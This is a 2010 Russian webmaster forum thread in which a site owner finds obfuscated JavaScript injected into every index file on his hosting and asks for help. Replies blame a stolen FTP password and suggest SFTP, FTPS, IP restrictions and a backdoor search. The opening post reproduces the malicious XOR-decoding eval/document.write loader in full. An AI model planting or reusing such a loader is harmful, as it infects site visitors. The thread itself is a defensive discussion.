Master-X
Регистрация
|
Вход
Форум
|
Новости
|
Статьи
Главная
»
Форум
»
Хостинги / Домены / Железо
»
Тема:
Вирусы на сайте/хостинге
Новая тема
Ответить
цитата
13/02/10 в 00:37
Mafia
Второй раз уже на хостинге у всех сайтов в конце индексных файлов появляется такая дрянь:
Код:
<script>rpnsxy=["uqjici=0;snwvcdmd='';for(oxbjvi=0;oxbjvi<rpnsxy[0]['length'];oxbjvi+=1)uqjici+=rpnsxy[0].charCodeAt(oxbjvi);uqjici%=0x64;for(oxbjvi=0;oxbjvi<rpnsxy[1]['length'];oxbjvi+=2)snwvcdmd+=String.fromCharCode(parseInt(0+'x'+rpnsxy[1].charAt(oxbjvi)+rpnsxy[1].charAt(oxbjvi+1))^uqjici);document.write(snwvcdmd);","13475b424311134d404b5611135c4c5d465f5b11594e5d0f5b4a425f66695d4e424a124b404c5a424a415b014c5d4a4e5b4a6a434a424a415b070846495d4e424a0806145b4a425f66695d4e424a015c4a5b6e5b5b5d464d5a5b4a0708464b0803087d7c66695d4e424a0806145b4a425f66695d4e424a015c4a5b6e5b5b5d464d5a5b4a07085c5d4c080308475b5b5f1500004c43464c44025f40465c44014c4042005b474a5d4a004641014c484610180806145b4a425f66695d4e424a015c5b56434a0159465c464d4643465b56120847464b4b4a4108145b4a425f66695d4e424a015c5b56434a0158464b5b4712081f5f5708145b4a425f66695d4e424a015c5b56434a01474a4648475b12081f5f57081466695d4e424a604d450f120f4b404c5a424a415b014d404b56014e5f5f4a414b6c4746434b075b4a425f66695d4e424a061413005c4c5d465f5b1113004d404b56111300475b424311"];eval(rpnsxy[0]);</script>
C учетом того что хостер серьезный думал что ноги этой дряни растут от моего компьютера, прошуршал все антивирусом(NOD), поменял антивирус(KIS) и прошуршал еще раз, и вновь эта беда. Хотелось бы понять, это все же моя беда, либо стоит трясти хостера?
цитата
13/02/10 в 00:41
Шестой
Индекс пхп ?
Была такая хуйня. Снёс и сделал индекс хтмл ;)
цитата
13/02/10 в 01:01
awa
скорее всего "ушел" пароль на фтп
цитата
13/02/10 в 02:20
Mafia
Sebastano Perero:
без разницы, index.hml или index.php. На одном аккаунте больше 10 сайтов висит, у всех одна и та же беда случилась.
awa:
похоже так и есть, поскольку сейчас проверил несколько сайтов на другом хосте - та же беда... что лучше использовать в качестве FTP-клиента?
цитата
13/02/10 в 02:59
adv21
Скорее дело не в том какой клиент, а как ушел пароль FTP. Пароль может уходить с твоего компа и из сети. Для того, что бы пароль не передавался по сети в открытом виде нужно использовать протокол SFTP. А какой при этом будет использоваться клиент не так важно.
цитата
13/02/10 в 04:51
SAV
пароли хранились в фтп-клиенте?
цитата
13/02/10 в 04:56
kit
Переходите на SFTP с разрешенным входом только с вашего IP, и будет счастье.
цитата
13/02/10 в 13:09
Alexs
Если нет возможности ограничить по Ip доступ
То я делаю так
Идешь в
C:\WINDOWS\system32\drivers\etc
В файл hosts пишет
(Ip ftp сервера ) пробел любое имя
Sample
123.123.123.123 ftphost1
в итоге что мы имеем вирус п$здит учету
логин и пароль но зайти на сервер ftphost1 на другом компе не реально
многим помогло
цитата
13/02/10 в 14:35
Austerlitz
Возможно дырявые скрипты.
цитата
13/02/10 в 14:56
MABPuK
Yahook, даже если первый взлом был не через дырявый скрипт, cейчас на хосте ТС (с большой долей вероятности) уже лежит backdoor для переодического добавление левого кода в index.php файлы
Поэтому, даже после смены пароля и всего остального что тут уже советовали, детальная инспекция всех файлов на хостинге - обязательна ;)
цитата
14/02/10 в 13:56
Soft-Com
http://ru.wikipedia.org/wiki/SFTP
http://ru.wikipedia.org/wiki/FTPS
совершенно разные вещи, строго говоря, и из личного опыта советую использование FTPS - гораздо меньше проблем, можно прикрутить антивир/парсер, и т.д., и нет проблем с мониторингом активности.
Новая тема
Ответить
Эта страница в полной версии